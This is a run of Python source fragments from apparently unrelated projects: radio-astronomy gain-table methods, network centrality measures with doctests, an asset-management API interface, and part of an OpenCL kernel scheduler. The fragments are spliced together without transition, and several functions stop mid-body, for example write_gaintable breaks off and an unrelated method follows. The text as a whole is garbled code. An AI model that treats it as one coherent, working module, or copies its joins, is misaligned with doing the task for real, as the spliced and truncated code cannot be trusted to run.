gains = NP.copy(self.gaintable[gainkey]['gains'])
else:
gains = NP.transpose(NP.copy(self.gaintable[gainkey]['gains']), axes=temp_transpose_order)
freqs_to_search = copy.copy(freqs)
if freqs_to_search is None:
freqs_to_search = copy.copy(self.gaintable[gainkey]['frequency'])
if freqs_to_search is not None:
if self.gaintable[gainkey]['frequency'] is not None:
inpind, refind_freqs, distNN = LKP.find_1NN(self.gaintable[gainkey]['frequency'].reshape(-1,1), freqs_to_search.reshape(-1,1), remove_oob=True)
else:
refind_freqs = None
if refind_freqs is None:
refind_freqs = NP.arange(gains.shape[1])
times_to_search = copy.copy(times)
if times_to_search is None:
times_to_search = copy.copy(self.gaintable[gainkey]['time'])
if times_to_search is not None:
if self.gaintable[gainkey]['time'] is not None:
inpind, refind_times, distNN = LKP.find_1NN(self.gaintable[gainkey]['time'].reshape(-1,1), times_to_search.reshape(-1,1), remove_oob=True)
else:
refind_times = None
if refind_times is None:
refind_times = NP.arange(gains.shape[2])
if gains.shape[0] == 1:
blgains = blgains * gains[:,refind_freqs,refind_times].reshape(1,refind_freqs.size,refind_times.size)
else:
labels = self.gaintable[gainkey]['label']
if gainkey == 'antenna-based':
ind1 = NMO.find_list_in_list(labels, a1_labels)
ind2 = NMO.find_list_in_list(labels, a2_labels)
if NP.sum(ind1.mask) > 0:
raise IndexError('Some antenna gains could not be found')
if NP.sum(ind2.mask) > 0:
raise IndexError('Some antenna gains could not be found')
blgains = blgains * gains[NP.ix_(ind2,refind_freqs,refind_times)].reshape(ind2.size,refind_freqs.size,refind_times.size) * gains[NP.ix_(ind1,refind_freqs,refind_times)].conj().reshape(ind1.size,refind_freqs.size,refind_times.size)
else:
labels_conj = [tuple(reversed(label)) for label in labels]
labels_conj = NP.asarray(labels_conj, dtype=labels.dtype)
labels_conj_appended = NP.concatenate((labels, labels_conj), axis=0)
gains_conj_appended = NP.concatenate((gains, gains.conj()), axis=0)
ind = NMO.find_list_in_list(labels_conj_appended, bl_labels)
selected_gains = gains_conj_appended[NP.ix_(ind.compressed(),refind_freqs,refind_times)]
if ind.compressed().size == 1:
selected_gains = selected_gains.reshape(NP.sum(~ind.mask),refind_freqs.size,refind_times.size)
blgains[~ind.mask, ...] = blgains[~ind.mask, ...] * selected_gains
if axes_order is None:
axes_order = inp_order
elif not isinstance(axes_order, (list, NP.ndarray)):
raise TypeError('axes_order must be a list')
else:
if len(axes_order) != 3:
raise ValueError('axes_order must be a three element list')
for orderkey in ['label', 'frequency', 'time']:
if orderkey not in axes_order:
raise ValueError('axes_order does not contain key "{0}"'.format(orderkey))
transpose_order = NMO.find_list_in_list(inp_order, axes_order)
blgains = NP.transpose(blgains, axes=transpose_order)
return blgains
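# A minimal usage sketch (hedged: 'gaintab', the antenna names and the
# structured dtype below are illustrative, not defined in this module):
#
#     import numpy as NP
#     bl_dtype = NP.dtype([('A1', 'U8'), ('A2', 'U8')])
#     bl_labels = NP.asarray([('ant01', 'ant02'), ('ant01', 'ant03')],
#                            dtype=bl_dtype)
#     g = gaintab.nearest_gains(bl_labels,
#                               freqs=NP.linspace(100e6, 200e6, 64),
#                               times=NP.arange(10.0),
#                               axes_order=['label', 'frequency', 'time'])
#     # g.shape -> (2, 64, 10)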
#############################################################################
def eval_gains(self, bl_labels, freq_index=None, time_index=None,
axes_order=None):
"""
------------------------------------------------------------------------
Extract complex instrument gains for given baselines from the gain table
Inputs:
bl_labels [Numpy structured array tuples] Labels of antennas in the
pair used to produce the baseline vector under fields 'A2'
and 'A1' for second and first antenna respectively. The
baseline vector is obtained by position of antennas under
'A2' minus position of antennas under 'A1'
freq_index [None, int, list or numpy array] Index (scalar) or indices
(list or numpy array) along the frequency axis at which
gains are to be extracted. If set to None, gains at all
frequencies in the gain table will be extracted.
time_index [None, int, list or numpy array] Index (scalar) or indices
(list or numpy array) along the time axis at which gains
are to be extracted. If set to None, gains at all times in
the gain table will be extracted.
axes_order [None or list or numpy array] Axes ordering for extracted
gains. It must contain the three elements 'label',
'frequency', and 'time'. If set to None, it will be
returned in the same order as in the input gaintable.
Outputs:
[numpy array] Complex gains of shape nbl x nchan x nts for the specified
baselines, frequencies and times.
------------------------------------------------------------------------
"""
return extract_gains(self.gaintable, bl_labels, freq_index=freq_index,
time_index=time_index, axes_order=axes_order)
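# Usage sketch (hedged: the index values are illustrative). Unlike
# nearest_gains(), which matches physical frequencies/times, the indices
# here select positions in the gain table directly:
#
#     g = gaintab.eval_gains(bl_labels, freq_index=[0, 5, 9],
#                            time_index=None,
#                            axes_order=['label', 'frequency', 'time'])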
#############################################################################
def write_gaintable(self, outfile, axes_order=None, compress=True,
compress_fmt='gzip', compress_opts=9):
"""
------------------------------------------------------------------------
Write gain table with specified axes ordering to external file in HDF5
format
Inputs:
outfile [string] Filename including full path into which the gain
table will be written
axes_order [None or list or numpy array] The axes ordering of gain
table that will be written to external file specified in
outfile. If set to None, it will store in the same order
as in the attribute gaintable
compress [boolean] Specifies if the gain table is written in
compressed format. The compression format and compression
parameters are specified in compress_fmt and compress_opts
respectively
compress_fmt
[string] Accepted values are 'gzip' (default) or 'lzf'. See
h5py module documentation for comparison of these
compression formats
compress_opts
[integer] Applies only if compress_fmt is set to 'gzip'. It
must be an integer in the range 0 to 9. Default=9 implies
maximum compression
------------------------------------------------------------------------
"""
try:
outfile
except NameError:
raise NameError('outfile not specified')
if axes_order is not None:
if not isinstance(axes_order, (list, NP.ndarray)):
raise TypeError('axes_order must be a list')
else:
if len(axes_order) != 3:
raise ValueError('axes_order must be a three element list')
def link_betweenness(self):
"""
For each link, return its betweenness.
This measures on how likely the link is on a randomly chosen shortest
path in the network. (Does not respect directionality of links.)
:rtype: square numpy array [node,node] of floats between 0 and 1
:return: Entry [i,j] is the betweenness of the link between i and j,
or 0 if i is not linked to j.
"""
# Calculate link betweenness
link_betweenness = self.graph.edge_betweenness()
# Initialize
result, ecount = np.zeros((self.N, self.N)), 0
# Get graph adjacency list
A_list = self.graph.get_adjlist()
# Write link betweenness values to matrix
for i in range(len(A_list)):
for j in A_list[i]:
# Only visit links once
if i < j:
result[i, j] = result[j, i] = link_betweenness[ecount]
ecount += 1
return result
def edge_betweenness(self):
"""
For each link, return its betweenness.
Alias to :meth:`link_betweenness`. This measures on how likely the
link is on a randomly chosen shortest path in the network.
(Does not respect directionality of links.)
**Example:**
>>> print Network.SmallTestNetwork().edge_betweenness()
Calculating link betweenness...
[[ 0.   0.   0.   3.5  5.5  5. ]
 [ 0.   0.   2.   3.5  2.5  0. ]
 [ 0.   2.   0.   0.   3.   0. ]
 [ 3.5  3.5  0.   0.   0.   0. ]
 [ 5.5  2.5  3.   0.   0.   0. ]
 [ 5.   0.   0.   0.   0.   0. ]]
:rtype: square numpy array [node,node] of floats between 0 and 1
:return: Entry [i,j] is the betweenness of the link between i and j,
or 0 if i is not linked to j.
"""
return self.link_betweenness()
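# Usage sketch: both calls return the same symmetric matrix, since
# edge_betweenness() is a thin alias of link_betweenness():
#
#     net = Network.SmallTestNetwork()
#     assert (net.link_betweenness() == net.edge_betweenness()).all()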
#
# Node valued centrality measures
#
@cached_const('base', 'btw', 'node betweenness')
def betweenness(self, no_big_int=True):
"""
For each node, return its betweenness.
This measures roughly how many shortest paths pass through the node.
**Example:**
>>> Network.SmallTestNetwork().betweenness()
Calculating node betweenness...
array([ 4.5, 1.5, 0. , 1. , 3. , 0. ])
:arg bool no_big_int: Toggles use of big integer calculation (slow if
False).
:rtype: 1d numpy array [node] of floats >= 0
"""
# Return the absolute value of normed tbc, since a bug sometimes
# results in negative signs
# The measure is normed by the maximum betweenness centrality achieved
# only by the star (Freeman 1978): (n**2-3*n+2)/2
# This restricts TBC to 0 <= TBC <= 1
# maxTBC = ( self.N**2 - 3 * self.N + 2 ) / 2
return np.abs(np.array(self.graph.betweenness(nobigint=no_big_int)))
@cached_const('base', 'inter btw', 'interregional betweenness')
def interregional_betweenness(self, sources=None, targets=None):
"""
For each node, return its interregional betweenness for given sets
of source and target nodes.
This measures roughly how many shortest paths from one of the sources
to one of the targets pass through the node.
**Examples:**
>>> Network.SmallTestNetwork().interregional_betweenness(
... sources=[2], targets=[3,5])
Calculating interregional betweenness...
array([ 1., 1., 0., 0., 1., 0.])
>>> Network.SmallTestNetwork().interregional_betweenness(
... sources=range(0,6), targets=range(0,6))
Calculating interregional betweenness...
array([ 9., 3., 0., 2., 6., 0.])
as compared to
>>> Network.SmallTestNetwork().betweenness()
Calculating node betweenness...
array([ 4.5, 1.5, 0. , 1. , 3. , 0. ])
:type sources: 1d numpy array or list of ints from 0 to n_nodes-1
:arg sources: Set of source node indices.
:type targets: 1d numpy array or list of ints from 0 to n_nodes-1
:arg targets: Set of target node indices.
:rtype: 1d numpy array [node] of floats between 0 and 1
"""
return self.nsi_betweenness(sources=sources, targets=targets,
aw=0, silent=1)
@cached_const('nsi', 'inter btw', 'n.s.i. interregional betweenness')
def nsi_interregional_betweenness(self, sources, targets):
"""
For each node, return its n.s.i. interregional betweenness for given
sets of source and target nodes.
This measures roughly how many shortest paths from one of the sources
to one of the targets pass through the node, taking node weights into
account.
**Example:**
>>> r(Network.SmallTestNetwork().nsi_interregional_betweenness(
... sources=[2], targets=[3,5]))
Calculating n.s.i. interregional betweenness...
array([ 3.1667, 2.3471, 0. , 0. , 2.0652, 0. ])
as compared to the unweighted version:
>>> Network.SmallTestNetwork().interregional_betweenness(
... sources=[2], targets=[3,5])
Calculating interregional betweenness...
array([ 1., 1., 0., 0., 1., 0.])
:rtype: 1d numpy array [node] of floats between 0 and 1
"""
return self.nsi_betweenness(sources=sources, targets=targets, silent=1)
def nsi_betweenness(self, **kwargs):
"""
For each node, return its n.s.i. betweenness.
This measures roughly how many shortest paths pass through the node,
taking node weights into account.
**Example:**
>>> net = Network.SmallTestNetwork()
>>> r(net.nsi_betweenness())
Calculating n.s.i. betweenness...
array([ 29.6854, 7.7129, 0. , 3.0909, 9.6996, 0. ])
>>> r(net.splitted_copy().nsi_betweenness())
Calculating n.s.i. betweenness...
array([ 29.6854, 7.7129, 0. , 3.0909, 9.6996, 0. , 0. ])
as compared to the unweighted version:
>>> net = Network.SmallTestNetwork()
>>> net.betweenness()
Calculating node betweenness...
array([ 4.5, 1.5, 0. , 1. , 3. , 0. ])
>>> net.splitted_copy().betweenness()
Calculating node betweenness...
array([ 8.5, 1.5, 0. , 1.5, 4.5, 0. , 0. ])
:rtype: 1d numpy array [node] of floats between 0 and 1
"""
if self.silence_level <= 1:
if "silent" not in kwargs:
print "Calculating n.s.i. betweenness..."
w = self.node_weights
if "aw" in kwargs:
if kwargs["aw"] == 0:
w = 0.0*w + 1.0
N, k = self.N, self.degree()
rN = range(0, N)
zn = np.zeros(N, dtype=float)
betweenness_times_w = zn.copy()
# initialize node lists:
is_source = zn.copy()
if "sources" in kwargs and kwargs["sources"] is not None:
for i in kwargs["sources"]:
is_source[i] = 1
else:
for i in rN:
is_source[i] = 1
if "targets" in kwargs and kwargs["targets"] is not None:
targets = kwargs["targets"]
else:
targets = rN
# node offsets for flat arrays:
offsets = np.zeros(N)
for i in range(1, N):
offsets[i] = offsets[i-1] + k[i-1]
# Note: we don't use k.cumsum() since that uses too much memory!
# sort links by node indices (contains each link twice!):
links = nz_coords(self.sp_A)
# neighbours of each node:
flat_neighbors = np.array(links)[:, 1].astype(int)
E = len(flat_neighbors)
# this main loop might be parallelized:
for j0 in targets:
j = int(j0)
betweenness_to_j = w.copy().astype(float)
excess_to_j = w.copy().astype(float)
flat_predecessors = list(np.zeros(E, dtype=int))
# Note: this cannot be passed as a numpy array, since if it is too
# large we get a glibc error...
_nsi_betweenness(N, E, w, k, j, betweenness_to_j,
excess_to_j, offsets.astype(int),
flat_neighbors,
is_source, np.array(flat_predecessors))
del flat_predecessors
betweenness_times_w += w[j] * (betweenness_to_j - excess_to_j)
return betweenness_times_w / w
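# Layout sketch for the flat arrays built above (hedged: a toy triangle
# graph, unrelated to SmallTestNetwork). For the undirected links
# 0-1, 0-2 and 1-2:
#
#     k = [2, 2, 2]                        # degrees
#     offsets = [0, 2, 4]                  # offsets[i] = sum(k[:i])
#     flat_neighbors = [1, 2, 0, 2, 0, 1]  # neighbours of node i occupy
#                                          # flat_neighbors[offsets[i]:offsets[i]+k[i]]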
def _eigenvector_centrality_slow(self, link_attribute=None):
"""
For each node, return its (weighted) eigenvector centrality.
This is the load on this node from the eigenvector corresponding to the
largest eigenvalue of the (weighted) adjacency matrix, normalized to a
maximum of 1.
:arg str link_attribute: Optional name of the link attribute to be used
as the links' weight. If None, links have weight 1. (Default: None)
:rtype: 1d numpy array [node] of floats
"""
if link_attribute == "topological":
print ("WARNING: link_attribute='topological' is deprecated.\n"
+ "Use link_attribute=None instead.")
link_attribute = None
if link_attribute is None:
if self.silence_level <= 1:
print "Calculating topological eigenvector centrality..."
return np.array(self.graph.eigenvector_centrality(weights=None))
else:
if self.silence_level <= 1:
print "Calculating weighted eigenvector centrality..."
return np.array(self.graph.eigenvector_centrality(
weights=link_attribute))
# faster version of the above:
@cached_const('base', 'ev centrality', 'eigenvector centrality')
def eigenvector_centrality(self):
"""
For each node, return its eigenvector centrality.
This is the load on this node from the eigenvector corresponding to the
largest eigenvalue of the adjacency matrix, normalized to a
maximum of 1.
**Example:**
>>> r(Network.SmallTestNetwork().eigenvector_centrality())
Calculating eigenvector centrality...
array([ 0.7895, 0.973 , 0.7769, 0.6941, 1. , 0.3109])
:rtype: 1d numpy array [node] of floats
"""
# TODO: allow for weights
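# sigma is chosen well above the spectral radius (<= N-1 for a simple
# graph), so shift-invert mode converges on the eigenvalue closest to
# sigma, i.e. the largest one.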
_, evecs = eigsh(self.sp_A.astype(float), k=1, sigma=self.N**2,
maxiter=100, tol=1e-8)
ec = evecs.T[0]
ec *= np.sign(ec[0])
return ec / ec.max()
@cached_const('nsi', 'ev centrality', 'n.s.i. eigenvector centrality')
def nsi_eigenvector_centrality(self):
"""
For each node, return its n.s.i. eigenvector centrality.
This is the load on this node from the eigenvector corresponding to the
largest eigenvalue of the n.s.i. adjacency matrix, divided by
sqrt(node weight) and normalized to a maximum of 1.
**Example:**
>>> net = Network.SmallTestNetwork()
>>> r(net.nsi_eigenvector_centrality())
Calculating n.s.i. eigenvector centrality...
array([ 0.8045, 1. , 0.8093, 0.6179, 0.9867, 0.2804])
>>> r(net.splitted_copy().nsi_eigenvector_centrality())
Calculating n.s.i. eigenvector centrality...
array([ 0.8045, 1. , 0.8093, 0.6179, 0.9867, 0.2804, 0.2804])
as compared to the unweighted version:
>>> r(net.eigenvector_centrality())
Calculating eigenvector centrality...
array([ 0.7895, 0.973 , 0.7769, 0.6941, 1. , 0.3109])
>>> r(net.splitted_copy().eigenvector_centrality())
Calculating eigenvector centrality...
array([ 1. , 0.8008, 0.6226, 0.6625, 0.8916, 0.582 , 0.582 ])
:rtype: 1d numpy array [node] of floats
"""
DwR = self.sp_diag_sqrt_w()
sp_Astar = DwR * self.sp_Aplus() * DwR
# For example, a host may need to determine where a
# 'shot' exists in a certain part of the asset system. One approach would be
# to use a 'getChildren' call, on this part of the system. This has the
# drawback that is assumes that shots are always something that can be
# described as 'immediate children' of the location in question. This lay not
# always be the case (say, for example there is some kind of 'task' structure
# in place too). Instead we use a request that asks for any 'shots' that
# relate to the chosen location. It is then up to the implementation of the
# ManagerInterface to determine how that maps to its own data model.
# Hopefully this allows Hosts of this API to work with a broader range of
# asset management systems, without imposing any requirements on their structure or
# data model.
#
# @{
@abc.abstractmethod
def getRelatedReferences(
self, entityRefs, relationshipSpecs, context, hostSession,
resultSpec=None):
"""
Returns related entity references, based on a relationship
specification.
This is an essential function in this API - as it is widely used
to query organisational hierarchy, etc...
There are three possible conventions for calling this function,
to allow for batch optimisations in the implementation and
prevent excessive query times with high-latency services.
- a) A single entity reference, a list of specifications.
- b) A list of entity references and a single specification.
- c) Equal length lists of references and specifications.
In all cases, the return value is a list of lists, for example:
a) getRelatedReferences([ r1 ], [ s1, s2, s3 ])
> [ [ r1s1... ], [ r1s2... ], [ r1s3... ] ]
b) getRelatedReferences([ r1, r2, r3 ], [ s1 ])
> [ [ r1s1... ], [ r2s1... ], [ r3s1... ] ]
c) getRelatedReferences([ r1, r2, r3 ], [ s1, s2, s3 ])
> [ [ r1s1... ], [ r2s2... ], [ r3s3... ] ]
@note The order of entities in the inner lists of matching
references will not be considered meaningful, but the outer list
should match the input order.
In summary, if only a single entityRef is provided, it should be
assumed that all specs should be considered for that one entity.
If only a single relationshipSpec is provided, then it should
be considered for all supplied entity references. If lists of
both are supplied, then they must be the same length, and it
should be assumed that it is a 1:1 mapping of spec per entity.
If this is not the case, ValueErrors should be thrown.
If any specification is unknown, then an empty list should be
returned for that specification, and no errors should be raised.
@param entityRefs List[str]
@param relationshipSpecs List[RelationshipSpecification]
@param context Context The calling context.
@param hostSession openassetio.managerAPI.HostSession The host
session that maps to the caller, this should be used for all
logging and provides access to the openassetio.managerAPI.Host
object representing the process that initiated the API session.
@param resultSpec openassetio.specifications.EntitySpecification
or None, a hint as to what kind of entity the caller is
expecting to be returned. May be None.
@return List[List[str]] This MUST be the correct length,
returning an empty outer list is NOT valid. (ie: max(len(refs),
len(specs)))
@exception ValueError If more than one reference and
specification is provided, but the lists are not equal in
length, ie: not a 1:1 mapping of entities to specs. The
abstraction of this interface into the Manager class does
cursory validation that this is the case before calling this
function.
@see @ref openassetio.specifications "specifications"
@see @ref setRelatedReferences
"""
raise NotImplementedError
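# A hedged sketch of the broadcast/validation contract documented above
# (the helper name is illustrative, not part of the API):
#
#     def _broadcast(entityRefs, relationshipSpecs):
#         if len(entityRefs) == 1:
#             entityRefs = entityRefs * len(relationshipSpecs)
#         elif len(relationshipSpecs) == 1:
#             relationshipSpecs = relationshipSpecs * len(entityRefs)
#         elif len(entityRefs) != len(relationshipSpecs):
#             raise ValueError("Expected a 1:1 mapping of refs to specs")
#         # both lists now have length max(len(refs), len(specs))
#         return entityRefs, relationshipSpecs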
def setRelatedReferences(
self, entityRef, relationshipSpec, relatedRefs,
context, hostSession, append=True):
"""
Creates a new relationship between the referenced entities.
Though getRelatedReferences is an essential call, there is some
asymmetry here, as it is not necessarily required to be able to
setRelatedReferences directly. For example, in the case of a
'shot' (as illustrated in the docs for getRelatedReferences) -
any new shots would be created by registering a new
ShotSpecification under the parent, rather than using this call.
The best way to think of it is that this call is reserved for
defining relationships between existing assets (such as
connecting the script used to define a render, with the image
# sequences it creates), and 'register' as defining the
relationship between a new asset and some existing one.
In systems that don't support post-creation adjustment of
relationships, this can simply be a no-op.
@param entityRef `str` The entity to which the relationship
should be established.
@param relationshipSpec openassetio.specifications.RelationshipSpecification,
The type of relationship to establish.
@param relatedRefs List[str], The related entities for the
given relationship.
@param context Context The calling context.
@param hostSession openassetio.managerAPI.HostSession The host
session that maps to the caller, this should be used for all
logging and provides access to the openassetio.managerAPI.Host
object representing the process that initiated the API session.
@param append bool, When True (default) new relationships will
be added to any existing ones. If False, then any existing
relationships with the supplied specification will first be
removed.
@return None
@see @ref getRelatedReferences
@see @ref register
"""
if not self.entityExists(entityRef, context, hostSession):
raise exceptions.InvalidEntityReference(entityReference=entityRef)
for ref in relatedRefs:
if not self.entityExists(ref, context, hostSession):
raise exceptions.InvalidEntityReference(entityReference=ref)
## @}
##
# @name Publishing
#
# The publishing functions allow a host to create entities within the
# @ref asset_management_system represented by this implementation. The API
# is designed to accommodate the broad variety of roles that
# different asset managers embody. Some are 'librarians' that simply
# catalog the locations of existing media. Others take an active role
# in both the temporary and long-term paths to items they manage.
#
# There are two key components to publishing within this API.
#
# **1 - The Entity Reference**
#
# As with the other entry points in this API, it is assumed that an @ref
# entity_reference is known ahead of time. How this reference is determined
# is beyond the scope of this layer of the API, and functions exist in
# higher levels that combine browsing and publishing etc... Here, we simply
# assert that there must be a meaningful reference given the @ref
# Specification of the entity that is being created or published.
#
# @note 'Meaningful' is best defined by the asset manager itself. For
# example, in a system that versions each 'asset' by creating children of the
# asset for each version, when talking about where to publish an image
# sequence of a render to, it may make sense to reference the Asset
# itself, so that the system can determine the 'next' version number at the
# time of publish. It may also make sense to reference a specific version of
# this asset to implicitly state which version it will be written to. Other
# entity types may not have this flexibility.
#
# **2 - The Specification**
#
# The Specification allows ancillary information to be provided to help the
# implementation better interpret what type of entity may be best suited in
# any given situation. For example, a path to an image will generally be
# accompanied by a spec that details the file type, color space,
# resolution etc...
#
# @note The Specification should *not* be confused with @ref attributes. The
# implementation must not directly store any information contained within the
# Specification, though it may be used to better define the type of entity.
# Hosts that wish to persist other properties of the published entity will
# call @ref setEntityAttributes() directly instead, and as described in the
# attributes section, it is assumed that this is the channel for information
# that needs to persist.
#
# For more on the relationship between Entities, Specifications and
# attributes, please see @ref entities_specifications_and_attributes.
<gh_stars>0
import pyopencl as cl
import pyopencl.tools
import pyopencl.array
import datetime
import collections
import os
from copy import deepcopy
import threading
# import mutex
import logging
import numpy as np
import constant_pyschedcl as cons
import time
import gc
import resource
from decimal import *
from collections import defaultdict
try:
import Queue as Q
except ImportError:
import queue as Q
numpy_types = {
"unsigned": np.uint32,
"unsigned int": np.uint32,
"uint": np.uint32,
"int": np.int32,
"long": np.int64,
"long int": np.int64,
"float": np.float32,
"double": np.float64,
"char": np.int8,
"short": np.int16,
"uchar": np.uint8,
"unsigned char": np.uint8,
"ulong": np.uint64,
"unsigned long": np.uint64,
"ushort": np.uint16,
"unsigned short": np.uint16
}
VEC_TYPES = ['char16', 'char2', 'char3', 'char4', 'char8', 'double16', 'double2', 'double3', 'double4', 'double8',
'float16', 'float2', 'float3', 'float4', 'float8', 'int16', 'int2', 'int3', 'int4', 'int8', 'long16',
'long2', 'long3', 'long4', 'long8', 'short16', 'short2', 'short3', 'short4', 'short8', 'uchar16', 'uchar2',
'uchar3', 'uchar4', 'uchar8', 'uint16', 'uint2', 'uint3', 'uint4', 'uint8', 'ulong16', 'ulong2', 'ulong3',
'ulong4', 'ulong8', 'ushort16', 'ushort2', 'ushort3', 'ushort4', 'ushort8', ]
SOURCE_DIR = os.getcwd()+"/"
MAX_GPU_ALLOC_SIZE = 0
MAX_CPU_ALLOC_SIZE = 0
# finished_kernels = list()
# q = Q.PriorityQueue()
for datatype in VEC_TYPES:
numpy_types[datatype] = eval('cl.array.vec.{}'.format(datatype))
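# Usage sketch: map an OpenCL C type name (as parsed from kernel metadata)
# to the numpy dtype used when packing host buffers. Note that newer
# PyOpenCL releases expose the vector types under pyopencl.cltypes instead
# of pyopencl.array.vec.
#
#     dt = numpy_types['float']        # -> np.float32
#     vdt = numpy_types['float4']      # -> cl.array.vec.float4
#     host_buf = np.zeros(1024, dtype=dt)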
system_cpus, system_gpus = 0, 0
nGPU, nCPU = 0, 0
est_cpu = 0.0
est_gpu = 0.0
device_history = {"gpu": [], "cpu": []}
ready_queue = {"gpu": collections.deque(), "cpu": collections.deque()}
# cs = mutex.mutex()
user_defined = dict()
dump_output = False
just_for_testing_num_chunks = 1
global_programs = defaultdict(dict)
# bolt = [0]
# rqlock = [0]
boltLock = threading.Lock()
rqLock = threading.Condition()
callback_queue = {}
###################TODO###############################
finishe_ker = list()
ex_callback_queue = {}
ex_callback_queue["READ"] = {}
ex_callback_queue["WRITE"] = {}
ex_callback_queue["KERNEL"] = {}
kernel_hist = {}
TASK = 0
ken = 0
enque_read = 0
enque_write = 0
duplicate_read = 0
duplicate_write = 0
kernel__data = {}
kernel__data1 = {}
kernel_dataset = {}
kernel_chunkleft = {}
kernel_buffer = {}
spantime = 0
release_host = list()
release_device = list()
count = 0
time1 = list()
construction_time = 0
kernel__name = {}
task_dag_object = None
done_events = []
frontier_Q = []
frontier_Q_lock = threading.Condition()
def convert_to_milliseconds(exec_time):
return 1000*exec_time
def adjust_zero(timestamps):
kernels = timestamps.keys()
reference_device = {}
reference_host = {}
total_time = 0
for kernel in kernels:
device = timestamps[kernel]["device"]
t = timestamps[kernel]["write"]["device_queued"]
if t == -1:
continue
if not (device in reference_device):
reference_device[device] = t
else:
reference_device[device] = min(reference_device[device],t)
t = timestamps[kernel]["write"]["host_queued"]
logging.info("Host Queued time: " + str(t))
if not (device in reference_host):
reference_host[device] = t
else:
reference_host[device] = min(reference_host[device],t)
relative_timestamps = deepcopy(timestamps)
global_reference = None
for key,value in reference_host.items():
if not global_reference:
global_reference = value
else:
global_reference = min(value,global_reference)
for kernel,kernel_timestamps in relative_timestamps.items():
device = kernel_timestamps["device"]
for event_type,event_timestamps in kernel_timestamps.items():
#print(event_type)
if event_type == "device":
continue
else:
#continue
for sub_event_type in event_timestamps:
if sub_event_type[:4] == "host":
event_timestamps[sub_event_type] -= global_reference
else:
event_timestamps[sub_event_type] = event_timestamps[sub_event_type] - reference_device[device] + reference_host[device] - global_reference
total_time = max(total_time,event_timestamps[sub_event_type])
#print "Total Time Taken - ",total_time
#print(json.dumps(relative_timestamps,sort_keys=True,indent=1))
return relative_timestamps, total_time
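# Shape of the input adjust_zero() expects (hedged: keys and values are
# illustrative):
#
#     timestamps = {
#         'kernel_0': {
#             'device': 'gpu0',
#             'write': {'host_queued': 12.0, 'device_queued': 3.0},
#             'ndrange': {'host_queued': 12.5, 'device_queued': 3.4},
#             'read': {'host_queued': 13.0, 'device_queued': 3.9},
#         },
#     }
#
# Device timestamps are shifted onto each device's host clock, and
# everything is rebased so the earliest host-queued write sits at 0.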
def replace(dictionary, a, b):
#print "replacing"
a = str(a)
b = str(b)
#print type(dictionary)
if type(dictionary) == list:
for item in dictionary:
replace(item,a,b)
elif type(dictionary) == dict:
for key in dictionary:
#print dictionary[key],type(dictionary[key])
if type(dictionary[key]) == dict:
replace(dictionary[key],a,b)
elif type(dictionary[key]) in [str]: #,unicode]:
#print "before replacement : ",dictionary[key]
dictionary[key] = dictionary[key].replace(a,b)
#print "after replacement : ",dictionary[key]
elif type(dictionary[key]) == list:
for item in dictionary[key]:
replace(item,a,b)
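# Example: substitute a symbolic size in place, as create_dag() does for
# each kernel's symbolicVariables:
#
#     d = {'globalWorkSize': 'N/2', 'buffers': [{'size': 'N'}]}
#     replace(d, 'N', '1024')
#     # d -> {'globalWorkSize': '1024/2', 'buffers': [{'size': '1024'}]}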
def create_dag(info_folder,dag_file,output_file,partition=-1):
from os import listdir
from os.path import join
import json
dag_info = open(dag_file,'r').readlines()
counter = 0
task_map = {}
task_symvar_map = {}
while dag_info[counter]!='---\n':
line = dag_info[counter].strip("\n")
key,value,symvar = line.split(" ")
task_map[int(key)] = value
task_symvar_map[int(key)] = eval(symvar)
counter += 1
counter += 1
adj_list = defaultdict(list)
buffer_edge_info = []
while dag_info[counter]!='---\n':
line = dag_info[counter].strip("\n")
u,v = line.split("->")
s,b_s = map(int,u.split(" "))
d,b_d = map(int,v.split(" "))
adj_list[d].append((s,b_s,b_d))
buffer_edge_info.append(line)
counter += 1
json_files = [join(info_folder,f) for f in listdir(info_folder)]
json_dictionary = {}
dag_json = []
print(adj_list)
for f in listdir(info_folder):
if f.endswith('.json') and (f in task_map.values()):
filename = join(info_folder,f)
with open(filename,'r') as g:
json_dictionary[f]=json.loads(g.read())
for t in task_map:
json_file = deepcopy(json_dictionary[task_map[t]])
json_file["id"]=t
json_file["symbolicVariables"]=task_symvar_map[t]
#print json_file
for sym,val in json_file["symbolicVariables"].items():
replace(json_file,sym,val)
json_file["depends"]=set()
json_file["partition"] = json_file["symbolicVariables"]["partition"]
if "localWorkSize" in json_file["symbolicVariables"]:
json_file["localWorkSize"] = [json_file["symbolicVariables"]["localWorkSize"] for _ in range(json_file["workDimension"])]
if partition!=-1:
if int(json_file["partition"]) == 10:
json_file["task"] = 0
else:
json_file["task"] = 1
# print "Task ",t
# print adj_list[t]
for v in adj_list[t]:
u,s_b,d_b = v
json_file["depends"].add(u)
from_value = {"kernel":u,"pos":s_b}
for buffer_type in ["inputBuffers","ioBuffers"]:
for buffer_info in json_file[buffer_type]:
if buffer_info["pos"]==d_b:
buffer_info["from"]=from_value
json_file["depends"] = list(json_file["depends"])
dag_json.append(json_file)
with open(output_file,'w') as g:
json.dump(dag_json,g,indent=2)
def blank_fn(*args, **kwargs):
"""
Does nothing. Used as dummy function for callback events.
"""
pass
class HostEvents(object):
"""
Class for storing timing information of various events associated with a kernel.
:ivar dispatch_start: Start Timestamp for dispatch function
:ivar dispatch_end: End Timestamp for dispatch function
:ivar create_buf_start: Start Timestamp for Creation of Buffers
:ivar create_buf_end: End Timestamp for Creation of Buffers
:ivar write_start: Start TimeStamp for Enqueuing Write Buffer Commands on Command Queue
:ivar write_end: End Timestamp for Writing of Buffers to Device
:ivar ndrange_start: Start TimeStamp for Launching Kernel
:ivar ndrange_end: End Timestamp for when kernel execution is finished on device
:ivar read_start: Start TimeStamp for Enqueuing Read Buffer Commands on Command Queue
:ivar read_end: End TimeStamp for Reading of Buffers from Device to Host
:ivar kernel_name: Name of kernel
:ivar kernel_id: Unique id for kernel
:ivar dispatch_id: Dispatch id for kernel
"""
def __init__(self, kernel_name='', kernel_id='', dispatch_id='', dispatch_start=None, dispatch_end=None,
create_buf_start=None, create_buf_end=None, write_start=None, write_end=None, ndrange_start=None,
ndrange_end=None, read_start=None, read_end=None):
"""
Initialise attributes of HostEvents class .
"""
self.dispatch_start = dispatch_start
self.dispatch_end = dispatch_end
self.create_buf_start = create_buf_start
self.create_buf_end = create_buf_end
self.write_start = write_start
self.write_end = write_end
self.ndrange_start = ndrange_start
self.ndrange_end = ndrange_end
self.read_start = read_start
self.read_end = read_end
self.kernel_name = kernel_name
self.kernel_id = kernel_id
self.dispatch_id = dispatch_id
def __str__(self):
a = deepcopy(self.__dict__)
for i in a:
a[i] = str(a[i])
return str(a)
def __repr__(self):
return str(self)
def is_not_empty(self):
fields = (self.dispatch_start, self.dispatch_end, self.create_buf_start,
